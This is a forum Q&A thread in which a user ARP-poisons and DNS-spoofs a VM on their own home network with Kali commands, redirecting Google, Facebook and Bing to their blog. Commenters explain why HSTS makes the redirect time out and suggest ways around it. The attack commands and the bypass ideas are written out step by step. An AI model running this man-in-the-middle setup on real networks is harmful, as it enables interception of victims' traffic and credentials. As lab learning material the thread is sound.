
SETUP:

Target Machine: VM on my network, on a machine that is hardwired to the router

Kali Box: Tried both in a VM on the same machine as my target and a live boot on a laptop over wifi. Both within the same network

MACHINE IPS:

Target: 192.168.1.83

Gateway: 192.168.1.254

Address to redirect to: 162.226.5.161 (my blog)

Steps taken to spoof dns:

  1. Set up traffic forwarding on my kali box

         echo 1 > /proc/sys/net/ipv4/ip_forward

  2. arp poison the gateway

         arp -i wlan0 -t 192.168.1.254 192.168.1.83

  3. arp poison the target

         arp -i wlan0 -t 192.168.1.83 192.168.1.254

  4. create a host file (using tab in between the ip and the url)

         cat > host
         162.226.5.161 *.google.com
         162.226.5.161 *.facebook.com
         162.226.5.161 *.bing.com

  5. start dns spoof

         dnsspoof -i wlan0 -f host

Results

When I use NSLOOKUP to retrieve the DNS records for my target sites, the expected ip of 162.226.5.161 is returned. However, when you go to the target sites in the browser it just times out.


When the target machine calls one of the target sites I can see dnsspoof logging the traffic.


THE PROBLEM:

As noted above, when you navigate to the target sites in the browser the request times out even though NSLOOKUP is returning the proper redirect ip.

DotNetRussell
  • Although your screenshots are hard to read, the two sites I see, www.google.com and www.facebook.com, are both on the **HSTS** preload list, and HTTPS (443) to your site 162.226.5.161 apparently times out (it does so from my ISP at least). – dave_thompson_085 Sep 20 '16 at 10:58
  • Oh interesting. I didn't realize it was attempting to forward to port 443. Is there a way to switch it to port 80? @dave_thompson_085 – DotNetRussell Sep 20 '16 at 11:01
  • 1
    To get a browser to send http to an HSTS host you'll have to patch the browser. Firefox and Chrome are open s9urce, but pretty big and complicated; if you're a very good programmer maybe a few weeks. (2) A nonbrowser client like curl or wget doesn't do HSTS and will send the request fine, but the results will be very hard to read. (3) You could set up an HTTP proxy so the browser thinks it is connecting to say `myfake.local` which has no HSTS and the proxy tries to relay to `www.google.com` which you spoof. Apache or nginx can do this, and maybe Squid or Burp etc.... – dave_thompson_085 Sep 21 '16 at 13:50
  • ... (0) But easier just use a host not set for HSTS in the first place, as you already found. – dave_thompson_085 Sep 21 '16 at 13:51
  • @dave_thompson_085 that's the direction I needed. Thank you, I will look into HTTP proxy next – DotNetRussell Sep 21 '16 at 13:51



So the answer was obvious I suppose but I still don't know how to work around this.

When the target machine was requesting a site such as Facebook.com, it was doing it over HTTPS obviously, which I guess meant it expected the site returned to accept an HTTPS connection.

This means that if I wish to DNS spoof and forward the target machine to a different site, that site (at least for the moment, until I figure out a workaround) needs to accept the same protocol that was initially requested.

To test this theory I found a site that allows HTTP connections (MSN.com) and I instead returned my blog. This worked swimmingly.

Results

So the short answer to the above problem was that I was attempting to forward the target to a machine that didn't support HTTPS, even though that's what the target machine's initial request was for.

By using a site that accepted HTTP requests I was able to confirm this was the problem.

DotNetRussell